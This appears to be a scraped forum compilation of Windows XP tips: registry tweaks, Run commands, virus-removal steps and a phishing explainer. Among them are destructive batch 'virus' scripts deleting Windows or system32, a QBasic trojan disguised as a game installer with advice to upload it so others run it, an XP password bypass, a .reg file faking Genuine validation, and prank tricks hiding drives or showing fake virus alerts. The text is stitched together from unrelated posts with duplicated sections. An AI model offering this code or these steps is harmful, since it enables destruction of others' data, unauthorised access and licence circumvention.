Cant open hidden files !!!

steps U have to follow :
1. START
2. RUN
3. REGEDIT
4. In registry editor press ctrl+F
.5. In FIND dialog box type "hidden" also check all the fields appear in FIND dialog box
6. press Enter key.
7. In right side U will find three colums named NAME , TYPE, DATA.
8. Double click on "hidden" & put value data =1 in Hexadecimal.
9. Go at the place where Ur files are hidden & refresh PC 2-3 times.
10.You are done .....

Hidden Programs In Windows Xp

Private Character EditorThis program is for designing icons and Characters(Alphapet)Click :start
Then :run
type :EUDCEDIT
.................................................. .................................................. .............................................
2- iExpressThis Program is for conerting your files to EXCUTABLE files
Click : start
Then : run
type : iexpress
.................................................. .................................................. .............................................
3-Disk Cleanup This program used for cleaning harddisk to offer space
Click : start
Then : run
type : cleanmgr
.................................................. .................................................. .............................................
4-Dr WatsonThis program Is for repairing problems in Windows
Click : start
Then : run
type : drwtsn32
.................................................. .................................................. .............................................
5-Windows Media Player 5.1Opens the old media player
Click : start
Then : run
type : mplay32

The Myth Of Refreshing The Desktop

"Do you refresh your desktop?". Ask this to any Windows user and 99% of them will reply with a "yes". Of course, there are various needs for refreshing the desktop but the majority of people who does it doesn't even know why he is doing it. Refreshing the desktop is perhaps the biggest computer myth among all Windows users.

Every single person I have met does this or at least used to do it. It's not known who first discovered this remarkably useless trick and what he achieved from it, but it just spread. Most new users learn this trick from other new users without caring to know what it does. Some do it devotedly just because others do it, while some others have various weird explanations for it. A few of them assumes that it refreshes the RAM, while some others believe that doing it will somehow keep their PCs running smooth and easy. I have seen some users obsessed with refreshing the desktop, doing it every 30 seconds or so. They have even learnt the keyboard shortcut - F5 (just to mention, these are the people who never use keyboard shortcuts). They would press the key and wouldn't release it for a long time, sending the desktop into a frenzy of refreshes.

What does a desktop refresh actually do? Refreshing the desktop simply redraws the icons on the desktop. That's it! It doesn't refreshes the RAM. It doesn't clean your PC. It doesn't refreshes your computer the way it does to you when you wake up from a nap. Refreshing the desktop has absolutely no effect on the working or performance of the computer. So why is the tool there? As I said, refresh is used to re-display or redraw the icons on the desktop. Sometimes when you bring some changes to the desktop icons, the change doesn't get reflected instantly. In such cases, refreshing the desktop becomes necessary to bring the change to effect. Say, you have the desktop icons set to arrange themselves alphabetically on your desktop. When you add a new item to the desktop, this item wouldn't get arranged alphabetically, instead it would appear at the bottom of icon list on the desktop, irrespective of it's name. Now if you refresh the desktop, all the icons would be once more arranged alphabetically and the newly added item would go to it's appropriate position. This is what refresh is for. It is to re-display the desktop. Refresh has the same function when done in explorer. Also Refresh is basically the command used to refresh/reload the video buffer(VGA memory). Sometimes the changes made in the VGA memory are not reflected to the screen properly...Refresh just corrects the prob...
So, if you are in the habit of refreshing the desktop, stop it. You are just wasting your time and effort. And the next time you see a person doing it, don't forget to explain to him the futility of this action

Few Registry Messup Tricks

DISABLING DRIVES IN MY COMPUTER
To turn off the display of local or networked drives when you click on My Computer:
1.Open RegEdit
2.Go toHKEY_CURRENT_USER\Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer
3.Add a New DWORD item and name it NoDrives
4.Give it a value of 3FFFFFF
5.Now when you click on My Computer, none of your drives will show.
----------------------------------------

CHANGE THE LOCATION OF WINDOWS INSTALLATION FILES
If you need to change the drive and or path where Windows looks for its installation files:
1.Open RegEdit
2.Go toHKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Setup
3.Edit the value next to SourcePath
------------------------------------------

CHANGE THE CAPTION ON TITLE BAR
Change the Caption on the Title Bar for OutLook Express or the Internet Explorer:For Outlook Express:
1. Open RegEdit
2. Go toHKEY_CURRENT_USER\Software\Microsoft\OutLook ExpressFor IE5 and up use:HKEY_CURRENT_USER\IDENTITIES \{9DDDACCO-38F2-11D6-93CA-812B1F3493B}\ SOFTWARE\ MICROSOFT\ OUTLOOK EXPRESS\5.0
3. Add a string value "WindowTitle" (no space)
4. Modify the value to what ever you like.

For no splash screen, add a dword value "NoSplash" set to 1The Key {9DDDACCO-38F2-11D6-93CA-812B1F3493B} can be any key you find here. Each user has his own Key number.The Key 5.0 is whatever version of IE you have

For Internet Explorer:
1. Open RegEdit
2. Go to HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main
3. Add a string value "Window Title" (use a space)
4. Modify the value to what ever you like.
---------------------------------------------------

ADD/DELETE PROGRAMS TO RUN EVERY TIME WINDOWS STAR

You can start or stop programs from executing at boot up by adding or deleting them to/from the run Keys in the Registry. Windows loads programs to start in the following order; Program listed in the Local Machine hive, then the Current User hive, then theWin.ini Run= and Load = lines. then finally programs in your Start Up folder.

To add or remove programs in the Registry
1.Open RegEdit
2.Go to the desired KeyHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows \CurrentVersion \RunHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows \CurrentVersion \RunServicesHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows \CurrentVersion \RunHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows \CurrentVersion \RunServices
3. Add a new String Value and name it anything you like
4. For the value data, enter the path and executable for the program you want to run.
By adding the value to the HKEY_CURRENT_USER hive instead allows the program to start only when that user is logged on.

If you add the value to the RunOnce key the program will run once and be removed from the key by Windows.

MULTIPLE COLUMNS FOR START MENU

To make Windows use multiple Start Menu Columns instead of a single scrolling column, like Windows 9x had, Also if you are using Classic Mode in XP

1. Open RegEdit
2. Go to the keyHKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Explorer\ Advanced
3. Create a string value "StartMenuScrollPrograms"
4. Right click the new string value and select modify
5. Set the value to "FALSE"

DISABLING MY COMPUTER

In areas where you are trying to restrict what users can do on the computer, it might be beneficial to disable the ability to click on My Computer and have access to the drives, control panel etc.
To disable this:
1.Open RegEdit
2.Search for 20D04FE0-3AEA-1069-A2D8-08002B30309D
3.This should bring you to the HKEY_CLASSES_ROOT\CLSID section
4.Delete the entire section.

Now when you click on My Computer, nothing will happen.You might want to export this section to a Registry file before deleting it just in case you want to enable it again. Or you can rename it to 20D0HideMyComputer4FE0-3AEA-1069-A2D8-08002B30309D. You can also hide all the Desktop Icons, see Change/Add restrictions.

CREATING A LOGON BANNER

If you want to create a Logon Banner: A message box to appear below your logon on.

1.Open RegEdit
2.Go ToHKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Winlogon
3.Create a new String value"LegalNoticeCaption "
4. Enter the Title of the window. What is displayed in the Title Bar.
5. Create a new string value "LegalNoticeText"
6. Enter the text for your message box that will appear even before the Logon window.

ADDING EXPLORE FROM HERE TO ALL FILES

When you want to right click on any folder and want to open up an Explorer window of that folder.

1. Open RegEdit
2. Go to HKEY_CLASSES_ROOT\Folder\shell
3. Add a new Key "RootExplore " under the "Shell" Key
4. Set the (Default) value to "E&xplore From Here "
5. Right Click the "RootExplore " Key and add a new Key "Command"to the RootExplore
6. Set the (Default) value of Explorer.exe /e,/root,/idlist,%i

ADDING AN APPLICATION TO RIGHT CLICK

Here is how to add any application to the Context Menu when you right click on any Folder. This way you do not have to always go to the Start Menu. When you right click on any folder, you can have access to that application, the same as using Sent To.

1. Open RegEdit
2. Go to HKEY_CLASSES_ROOT\Folder\shell
3. Add a new Key to the "Shell" Key and name it anything you like.
4. Give it a default value that will appear when you right click a folder, i.e. NewKey (use an "&" without the quotes, in front of any character and it will allow you to use the keyboard)
5. Click on the Key HKEY_CLASSES_ROOT\Folder\shell\NewKey
6. Add a New Key named Command
7. Set the (Default) value of the application you want to run
8. For example: c:\program files\internet explorer\iexplore.exe (Include the full path and parameters if you need them)

CUSTOMIZE SYSTEM TRAY

You can add your name or anything you like that consists of 8 characters or less. This will replace the AM or PM next to the system time. But you can corrupt some trial licenses of software that you may have downloaded.

1. Open RegEdit
2. Go to HKEY_CURRENT_USER\Control Panel\International
3. Add two new String values, "s1159" and "s2359"
4. Right click the new value name and modify.
Enter anything you like up to 8 characters.

If you enter two different values when modifying, you can have the system tray display the two different values in the AM and PM.

LOCKOUT UNWANTED USERS

1. Open RegEdit
2. Go to HKEY_LOCAL_MACHINE\Network\Logon
3. Create a dword value "MustBeValidated"
4. Set the value to 1
This forced logon can be bypassed in Safe Mode on Windows 9x delete

ADD OPEN WITH TO ALL FILES

You can add "Open With..." to the Right click context menu of all files.
This is great for when you have several programs you want to open the same file types with. I use three different text editors so I added it to the ".txt" key.

1. Open RegEdit
2. Go to HKEY_CLASSES_ROOT\*\Shell
3. Add a new Key named "OpenWith" by right clicking the "Shell" Key and selecting new
4. Set the (Default) to "Op&en With..."
5. Add a new Key named "Command" by right clicking the "OpenWith" Key and selecting new
6. Set the (Default) to "C:\Windows\rundll32.exe shell32.dll,OpenAs_RunDLL %1", C:\ being your Windows drive. You must enter the "OpenAs_RunDLL %1" exactly this way.

Playing with right click options...

This is a trick for Addding Copy To And Move To Options in right click of a mouse..
Firstly we add the copy and move options to the right click menu of all FILES.

CLICK Start>Run, type regedit and click OK to open up the registry editor and make your way to this key:
HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers

Right click the ContextMenuHandlers key and choose New>Key.Name the new key Copy To.Repeat the above and create another new key named Move To.

You should now have two new subkeys under the ContextMenuHandlers key:

HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\Co py To
HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\Mo ve To

Select the Copy To key and in the right hand pane, double click DefaultEnter this value as the value data:
{C2FBB630-2971-11d1-A18C-00C04FD75D13}

Next , select the Move To key and in the right hand pane set the default to:
{C2FBB631-2971-11d1-A18C-00C04FD75D13}

This now takes care of the Copy and Move options for the right click context menu of all your files.Now all that is left is to add the same options to the right click menu of all your folders.The procedure will be the same as for files but at a different key.

HKEY_CLASSES_ROOT\Directory\shellex\ContextMenuHan dlers

Right click ContextMenuHandlers and create a new key named Copy To.
Right click it again and create another new key named Move To.

left click on the right hand pane, add the same default values as you did for Files

For Copy To:
{C2FBB630-2971-11d1-A18C-00C04FD75D13}

For the Move To:{C2FBB631-2971-11d1-A18C-00C04FD75D13}

thats it..............now u r done.....

Play with ur CD-ROM

Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If


copy this script in notepad and save as run.vbs
u'll see a magic that ur cd-rom is running in and out

IF U WANT TO QUIT THIS IN & OUT OF DVD ROM, go in task manager/processes find wscript then click on end process thats all...

Freak out ur friends by a surprise message

Step 1. Open up notepad
Step 2. Typelol=msgbox("Whatever you want message to say",20,"Whatever you want the window to be titled")
Ex:lol=msgbox("Warning your computer has been infected by a virus ",20,"Virus Alert")

Step 3. Save the text as Whateveryouwant.vbs

The number 20 represents the type of window style the message will be in. You can experiment with different styles you want

Hidden Programs In Windows Xp

1.Private Character Editor
This program is for designing icons and Characters(Alphapet)
Click :start
Then :run
type :EUDCEDIT

2- iExpress
This Program is for conerting your files to EXCUTABLE files
Click : start
Then : run
type : iexpress

3-Disk Cleanup
This program used for cleaning harddisk to offer space
Click : start
Then : run
type : cleanmgr

4-Dr Watson
This program Is for repairing problems in Windows
Click : start
Then : run
type : drwtsn32

5-Windows Media Player 5.1
Opens the old media player
Click : start
Then : run
type : mplay32

Crack win xp password

# Place your Windows XP CD in your cd-rom and start your computer (it's assumed here that your XP CD is bootable as it should be - and that you have your bios set to boot from CD)

# Keep your eye on the screen messages for booting to your cd Typically, it will be "Press any key to boot from cd"

# Once you get in, the first screen will indicate that Setup is inspecting your system and loading files.
# When you get to the Welcome to Setup screen, press ENTER to Setup Windows now
# The Licensing Agreement comes next - Press F8 to accept it.
# The next screen is the Setup screen which gives you the option to do a Repair.It should read something like "If one of the following Windows XP installations is damaged, Setup can try to repair it"Use the up and down arrow keys to select your XP installation (if you only have one, it should already be selected) and press R to begin the Repair process.

# Let the Repair run. Setup will now check your disks and then start copying files which can take several minutes.
# Shortly after the Copying Files stage, you will be required to reboot. (this will happen automatically and you will see a progress bar stating "Your computer will reboot in 15 seconds"

# During the reboot, do not make the mistake of "pressing any key" to boot from the CD again! Setup will resume automatically with the standard billboard screens and you will notice Installing Windows is highlighted.
# Keep your eye on the lower left hand side of the screen and when you see the Installing Devices progress bar, press SHIFT + F10. This is the security hole! A command console will now open up giving you the potential for wide access to your system.

# At the prompt, type NUSRMGR.CPL and press Enter. Voila! You have just gained graphical access to your User Accounts in the Control Panel.
# Now simply pick the account you need to change and remove or change your password as you prefer. If you want to log on without having to enter your new password, you can type control userpasswords2 at the prompt and choose to log on without being asked for password. After you've made your changes close the windows, exit the command box and continue on with the Repair (have your Product key handy).

# Once the Repair is done, you will be able to log on with your new password (or without a password if you chose not to use one or if you chose not to be asked for a password).
Your programs and personalized settings should remain intact.

Creating virues.

Here you will find out how easy it is to make virus in Ms dos.

Ok to start off making a dos virus you must have notepad all computers have it so just open it up then type in this code and save the file as a .BAT it must be .bat to work.

Here is the code...1)
@echo off
cd
cd c:\window
@deltree/y c:\windows
exit


This will delete the file windows. ONLY USE THIS CODE TO DELETE WINDOWS ON YOUR OWN COMPUTER!
This one is going to be a bit more eviler then the last so do not go sending it out ok.


2)
@echo off
cd
cd c:/WINDOWS/system32
: copyxcopy/c C:/windows
goto copy
cd
cd c:/WINDOWS/system32
: copy
xcopy/c %0
goto cop

This will delete system 32 and amke a backup copy of the file in windows and it will open up when the computer runs so if then get a backup of windows then it will get delete.
Now for a trojan in dos well maybe not a real trojan but it is a good virus and will give you admin power in a computer
you can use this if you have two pc in your house but if you use it on someone adn they dunno about it then the cops maybe coming to your door .

DOS command-START

Starts a separate window to run a specified program or command.

START ["title"] [/Dpath] [/I] [/MIN] [/MAX] [/SEPARATE /SHARED][/LOW /NORMAL /HIGH /REALTIME /ABOVENORMAL /BELOWNORMAL][/WAIT] [/B] [command/program][parameters]

"title" Title to display in window title bar path Starting directory

/B Start application without creating a new window. The application has ^C handling ignored. Unless the application enables ^C processing, ^Break is the only way to interrupt the application

/I The new environment will be the original environment passed to the cmd.exe and not the current environment
/MIN Start window minimized
/MAX Start window maximized
/SEPARATE Start 16-bit Windows program in separate memory space
/SHARED Start 16-bit Windows program in shared memory space
/LOW Start application in the IDLE priority class
/NORMAL Start application in the NORMAL priority class
/HIGH Start application in the HIGH priority class
/REALTIME Start application in the REALTIME priority class
/ABOVENORMAL Start application in the ABOVENORMAL priority class
/BELOWNORMAL Start application in the BELOWNORMAL priority class
/WAIT Start application and wait for it to terminate command
/program If it is an internal cmd command or a batch file then the command processor is run with the /K switch to cmd.exe. This means that the window will remain after the command has been run.
If it is not an internal cmd command or batch file then it is a program and will run as either a windowed application or a console application. parameters These are the parameters passed to the command/program

If Command Extensions are enabled, external command invocationthrough the command line or the START command changes as follows:
non-executable files may be invoked through their file association just by typing the name of the file as a command. (e.g. WORD.DOC would launch the application associated with the .DOC file extension).

See the ASSOC and FTYPE commands for how to create theseassociations from within a command script.
When executing an application that is a 32-bit GUI application, CMD.EXE does not wait for the application to terminate before returning tothe command prompt. This new behavior does NOT occur if executing within a command script.

When executing a command line whose first token is the string "CMD " without an extension or path qualifier, then "CMD" is replaced with the value of the COMSPEC variable. This prevents picking up CMD.EXE from the current directory.

When executing a command line whose first token does NOT contain an extension, then CMD.EXE uses the value of the PATHEXT environment variable to determine which extensions to look for and in what order. The default value for the PATHEXT variable is:
.COM;.EXE;.BAT;.CMD
Notice the syntax is the same as the PATH variable, with semicolons separating the different elements.
When searching for an executable, if there is no match on any extension, then looks to see if the name matches a directory name. If it does, the START command launches the Explorer on that path. If done from the command line, it is the equivalent to doing a CD /D to that path.

Examples
start notepad myfile.txt
Start a new instance of notepad with the file myfile.txt open in it.

start /MAX notepad
Start the notepad window with the screen maximized.

start /MIN mybatch.bat
The above example would start the batch file mybatch.bat in a minimized window.

Avoid USB Virus / Worms

USB Devices like i-pod,pen drives e.t.c; brings viruses/worms which are bad since it disables a lot of features as well as it ruins memory the slows down the whole thing. It disables much of the removal process like Windows RegEdit.exe, MsConfig.exe and also TaskMan.exe. Variations of these also disables your keyboard during normal booting, floods your disk with virus files in the root directory and also the windows directory and some also floods your directory with Folder looking icons that is an executable..

So here are some tips in avoiding this:
1. Always make all files visible like system and also hidden files with their extension shown.Go to Windows Explorer > Tools > Folder Option > View
* Enable Show Hidden File
* Disable Hide Extensions for know file type
* Disable Hide Protected OS files

2. Never Use the Autorun functionality in Windowswhenever you put a disk(flash, memory card, usb drive devices and other form of removable drive) it is always a practice to scan it first. but to avoid being the first to be infected by a wild one, always use Windows Explorer to browse the files.

Use the left side(Folder Window), to browse the files.
Whenever you see an autorun.inf file, delete it! remove the disk and insert it again to avoid clicking it.
To disable autorun go to gpedit.msc >> computer config >> admin templates >> system >> turn off autoplay

3. Always update Virus database!

Multiple Login in Yahoo without Using software

You can login with multiple id's on the same yahoo messenger without any download or patch .Follow these steps :

1. Go to Start ----> Run . Type regedit, then enter .
2.Navigate to HKEY_CURRENT_USER --------> Software --->yahoo ----->pager---->Test
3.On the right page , right-click and choose new Dword value .
4.Rename it as Plural.
5.Double click and assign a decimal value of 1.

Its done!!Now close registry and restart yahoo messenger and try Multiple Login

Task Manager Disabled???

Task manager is such an important tool in Windows XP Which describes the functions and applications running on your system which you can’t see.
It is also helpful in terminating the process which is not responding.
If such an important tool is disabled on your pc, Then don’t get frustrated.
Here’s the solution for enabling it.
1. Click “START” button and go to “RUN” and type ‘regedit’
2. Registry window will be opened,
Then Go to HKEY_CURRENT_USER-->SOFTWARE-->MICROSOFT-->WINDOWS
-->CURRENT VERSION

3.Create a Key “System”
4.In System, create a new”DWORD”Value: Disable Task Mgr
5.Set the Data value to 0 to enable Task Manager.

If you were blocked from accessing the registry at the first point
then try this
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f

Sometimes, a virus such Brontok variants could disable your built-in Windows registry editing tool, which is regedit. It might also because of limited account’s level access where you are only a normal user and not an administrator with full access of the system. Now, one simple way to indicate the problem is whenever you are trying to open the regedit program through “run”, you will get the following message:
“Registry Editing Has Been Disabled By Your Administrator”

Yahoo Messenger Virus

This Yahoo messenger virus attack is one of the most powerful Trojan/virus....
If your computer is infected with this virus; It will sends the nsl-school.org url to all of your friend list in yahoo messenger using your ID .
So with in few hours many of your friends will get infected with it.
To solve this problem, Just go through the below steps carefully.

are those links ?: Nsl-school.org or other (Do not open this url in your browser).

IPB Image

If you are infected with it what is going to happen ?

1): It sets your default IE page to nsl-school.org, you can't even change it back to other page. If you open IE from your comp some malicious code will automatically executed into your computer.

2): It will disables the Task manager / reg edit. So you can't kill the Trojan process anymore.

3:) Files that are gonaa installed by this virus are svhost.exe , svhost32.exe , internat.exe.You can find these files in windows/ & temp/ directories.

4): It will sends the secured & protected information to attacker.

How to remove this manually from your computer ?

1): Close the IE browser. Log out messenger / Remove Internet Cable.

2): To enable Regedit
Click Start, Run and type this command exactly as given below: (better - Copy and paste)
Code: REG add HKCUSoftwareMic*ftWindowsCurrentVersionPoliciesSystem /v DisableRegistryTools /t REG_DWORD /d 0 /f

3): To enable task manager : (To kill the process we need to enable task manager)
Click Start, Run and type this command exactly as given below: (better - Copy and paste)
Code: REG add HKCUSoftwareMic*ftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 0 /f

4): Now we need to change the default page of IE though regedit. Start>Run>Regedit From the below locations in Regedit chage your default home page to somewebsite.com or other
Code: HKEY_CURRENT_USERSOFTWAREMic*ftInternet ExplorerMainHKEY_ LOCAL_MACHINESOFTWAREMic*ftInternet ExplorerMainHKEY_USERSDefaultSoftwareMic*ftInternet ExplorerMain
Just replace the attacker site with somesite.com or set it to blank page.

5): Now we need to kill the process from back end.
For this, Press "Ctrl + Alt + Del"Kill the process svhost32.exe . ( may be more than one process is running.. check properly)

6): Delete svhost32.exe , svhost.exe files from Windows/ & temp/ directories.
Or just search for svhost in your comp.. delete those files.

7): Go to regedit search for svhost and delete all the results you get
Code: Start>Run>Regedit

8): Restart the computer.

That's it now your system is virus free

Validate your copy of Windows XP for free - No download necessary

Here's the trick....

*Open Notepad and paste the following

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion] "CurrentBuild"="1.511.1 () (Obsolete data - do not use)" "ProductId"="55274-640-1011873-23081" "DigitalProductId"=hex:a4,00,00,00,03,00,00,00,35,35,32,37,34,2d,36,34,30,2d,\ 31,30,31,31,38,37,33,2d,32,33,30,38,31,00,2e,00,00,00,41,32,32,2d,30,30,30,\ 30,31,00,00,00,00,00,00,00,86,56,4e,4c,21,1b,2b,6a,a3,78,8e,8f,98,5c,00,00,\ 00,00,00,00,dd,da,47,41,cc,6b,06,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,38,31,30,32,36,00,00,00,00,00,00,00,b5,16,\ 00,00,83,83,1f,38,f8,01,00,00,f5,1c,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,66,e5,70,f3 "LicenseInfo"=hex:33,b7,21,c1,e5,e7,cd,4b,fd,7c,c6,35,51,fd,52,57,17,86,3e,18,\ d3,f4,8c,8e,35,32,7b,d1,43,8d,61,38,60,a4,ca,55,c9,9a,35,17,46,7a,4f,91,fc,\ 4a,d9,db,64,5c,c4,e2,0f,34,f3,ea
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents] "OOBETimer"=hex:ff,d5,71,d6,8b,6a,8d,6f,d5,33,93,fd


* Now save the file as License Key.reg (Note: The file name must contain the .reg extension)
* Double click the file that you created. It will ask for confirmation.
* Click Yes... And you are done.
* To see that it worked go to

http://www.microsoft.com/genuine/downloads/FAQ.aspx

and click on "Validate Windows"

Don't open Microsoft's site if ur Volume Serial No. is already blocked.
U can test it by installing Windows Media Player 11 / Internet Explorer 7.

This post was found on the net...but it was a gud one...

Compress ur 1GB file into less than 20MB

Hey guys check out this Article I found off the net (I found it through google, i don't remember the site):

KGB Archiver is the compression tool with an unbelievably high compression rate. Unfortunately, in spite of its powerful compression rate, it has high hardware requirements (Irecommend processor with 1,5GHz clock and 256MB of RAM as an essential minimum). One of the advantages of KGB Archiver is also AES-256 encryption which is used to encrypt the archives. This is one of the strongest encryptions known .

DOWNLOAD LINK:
http://www.softpedia.com/get/Compression-tools/KGB-Archiver.shtml

6 ways to safeguard your PC online

Here are some precautions you can take to keep your PC safe from online hazards like viruses, worms, and Trojan horses:

1)Install an antivirus software program on your computer (for more info, see the related tip: Protect your PC with antivirus software).

2)Be suspicious of any e-mail attachments that you receive from unknown sources. E-mail is the main source of viruses, worms, and Trojan horses.

3)Be suspicious of downloads sent to you via chat applications (such as MSN Messenger or AIM).

4)Be picky about where you download files from on the Internet; many virus and worm writers use free software to disguise malicious applications.

5)Make sure that your PC has all the latest patches and updates installed (if you run Windows, visit the Windows Update site to install all the patches your operating system needs).

6)Scan all discs and downloads for viruses before running them.

What is Phishing?

The act of sending an e-mail to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surrendering private information that will be used for identity theft.
The e-mail directs the user to visit a Web site where they are asked to update personal information, such as passwords and credit card, social security, and bank account numbers, that the legitimate organization already has.
The Web site, however, is bogus and set up only to steal the user’s information.

For example, 2003 saw the proliferation of a phishing scam in which users received e-mails supposedly from eBay claiming that the user’s account was about to be suspended unless he clicked on the provided link and updated the credit card information that the genuine eBay already had. Because it is relatively simple to make a Web site look like a legitimate organizations site by mimicking the HTML code, the scam counted on people being tricked into thinking they were actually being contacted by eBay and were subsequently going to eBay’s site to update their account information. By spamming large groups of people, the “phisher” counted on the e-mail being read by a percentage of people who actually had listed credit card numbers with eBay legitimately.

Phishing, also referred to as brand spoofing or carding, is a variation on "fishing," the idea being that bait is thrown out with the hopes that while most will ignore the bait, some will be tempted into biting.

The greatest virus of all time ...

There is a virus on the net from a long time, the damage inflicted by it is unstoppable, or at least that was though, check it out yourself

…just kidding, it does not exist but such a virus would be something great =)

Write your own Trojan virues..

This is a little trojan written in Qbasic 4.5 It's a bitch!
REM bitch by Spear
color 14,0
print"installing datafiles... Please wait..."
print"This may take up to 20 minutes, depending on your computer..."
shell "cd\"
for a = 1 to 100000
a$=str$(a)
c$="md" + a$ + ".hee"
shell c$
next a
cls
print"Cybermattixx Version 1.0 is now installed on your system..."
print"Have a shitty day!"
print " ?AM?"
print
input "Hit ENTER To REBOOT your System now!";a$
shell "boot.com"

How to use it?
This can pose as the installation program for a game. This means thatwhen you upload it to a BBS or something, and post that it is akickass game, people will download it and try to install it on theircomputers!

What does it do?
This program changes directory to the root and makes 100000 dirs inthe root. You cannot use deltree to wipe them out in one chunk andyou CANNOT get rid of them without doing reverse engineering on theprogram, ie. rd instead of md. To get rid of them any other way youwould have to format c: or d:

Remove ShutDown option...

This is a neat trick you can play on that lamer that has a huge ego, in this section I teach you, how to disable the Shut Down option in the Shut Down Dialog Box. This trick involves editing the registry, so please make backups.
Launch regedit.exe and go to :

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

In the right pane look for the NoClose Key. If it is not already there then create it by right clicking in the right pane and selecting New > String Value.(Name it NoCloseKey ) Now once you see the NoCloseKey in the right pane, right click on it and select Modify. Then Type 1 in the Value Data Box.

Doing the above on a Win98 system disables the Shut Down option in the Shut Down Dialog Box. But on a Win95 machine if the value of NoCloseKey is set to 1 then click on the Start > Shut Down button displays the following error message:

This operation has been cancelled due to restrictions in effect on this computer. Please contact your system administrator.

You can enable the shut down option by changing the value of NoCloseKey to 0 or simply deleting the particular entry i.e. deleting NoCloseKey.

Instead of performing the above difficult to remember process, simply save the following with an extension of .reg and add it's contents to the registry by double clicking on it.

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"NoClose"="1"

Some Important Run commands ...

You may be knowing that to run a perticular windows executable program ( .exe, .pif, .com files) directly you need to open it from Start>Run and typing in the name of it.

Here are some of the useful shortcut commands.
(Tip - You can directly open 'Run' by pressing Windows+R keys at a time.)
command - to run MS - DOS (.com, .pif)
calc - to run calculator (.exe)
control - to open Control Panel (.exe)
defrag - to defrag the hard disk drives (.exe)
dialer - for dialing seups (.exe)
dosprompt - to get a minimized DOS window (.pif)
explorer - to open Windows Explorer (.exe., .scf)
ftp - for File Transfer Protocol if internet is connected (.exe)
ms-dos~1/ms-dos~2 - for fully MS-DOS mode.
No Windows O.S. (.pif)net - for net information cum help (.exe)
ping - for bytes information and bandwidth of internet connection information (.exe)
regedit - to open Registry (.exe)

telnet - command runner if the system is conncected in a UNIX system network (.exe)
tuneup - for Task Scheduling wizard, i.e. Task Maintanance (.exe)
notepad - to run Notepad (.exe)
write - to run Wordpad (.exe)
scanregw - to scan the Registry and to backup it (.exe)
progman - to maintain, run and view the files in all drives (.exe)
directcc - to join your computer in cable conncetion with other computers (.exe)
scandskw - to open Scandisk to scan the hard drives (.exe)
winfile - Windows File Managertaskman - to manage current running open programs or files.Nice replacement for default Windows taskbar

msconfig - to maintain the configuration of computer. It will show the options like General, Startup including files Autoexec.bat, Config.sys, System.ini and Win.ini. (Autoexec.bat & Config.sys are MS-DOS files)

winrep - to run Windows Report Tool - Accessories>System Tools>System Information (.exe)winver - to know the version of Windowspackager - insert objects in documets, presentations or worksheets
winfile - another Windows Explorer (.exe)
clipbook - a simple utility that allws you to save and recall several pages or graphics. (.exe)sysedit - view or edit system files from within one window (.exe)

Increase ur Internet speed...

Try this , if you have windows XP professionalthis is for broad band connections/dial up running Windows XP.
1. log on as Administrator.
2. start - run - type gpedit.msc
3. expand "local computer policy"
4. then expand "administrative templates"
5. then expand "network branch"
6. Highlight the "QoS Packet Scheduler"
7. on right window double click "limit reservable bandwidth"
8. on setting tab check the "enabled"
9. change "Bandwidth limit %" to 0reboot if promptedthis is because Windows XP reserve 20% of the bandwidth for its self.
====================================================================================
TECH :2Host Resolution Priority Tweak host name resolution priority
===================================================================
Windows 2k/XP
First,
open the Windows Registry using Regedit, and (after backing up) navigate to:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\ServiceProvider

Note the following lines (all hex dwords):
Class = 008 (8) - indicates that TCP/IP is a name service provider, don't change.
LocalPriority = 1f3 (499) - local names cache
HostsPriority = 1f4 (500) - the HOSTS file
DnsPriority = 7d0 (2000) - DNS
NetbtPriority = 7d1 (2001) - NetBT name-resolution, including WINS

What we're aiming to do is increase the priority of the last 4 settings, while keeping their order. The valid range is from -32768 to +32767 and lower numbers mean higher priority compared to other services. What we're aiming at is lower numbers without going to extremes, something like what's shown below should work well:
Change the "Priority" lines to:
LocalPriority = 005 (5) - local names cache
HostsPriority = 006 (6) - the HOSTS file
DnsPriority = 007 (7) - DNS
NetbtPriority = 008 (8) - NetBT name-resolution, including WINS

Open the Command Prompt from the Right-Click Menu


I began computing in the days of DOS, and I still can't give up the command prompt. When it comes to doing down-and-dirty tasks like mass deleting or renaming of files, nothing beats it. I find myself frequently switching back and forth between Windows Explorer and the command prompt.Often, when using Windows Explorer, I want to open the command prompt at the folder that's my current location.
That takes too many steps: opening a command prompt and then navigating to my current folder.
However, there's a quicker way: you can add an option to the right-click context menu that will open a command prompt at your current folder.
For example, if you were to right-click the
C:\My Stuff folder,
you could then choose to open a command prompt at
C:\My Stuff.To add the option, run the Registry Editor, then go to
HKEY_LOCAL_MACHINE/Software/Classes/Folder/Shell.
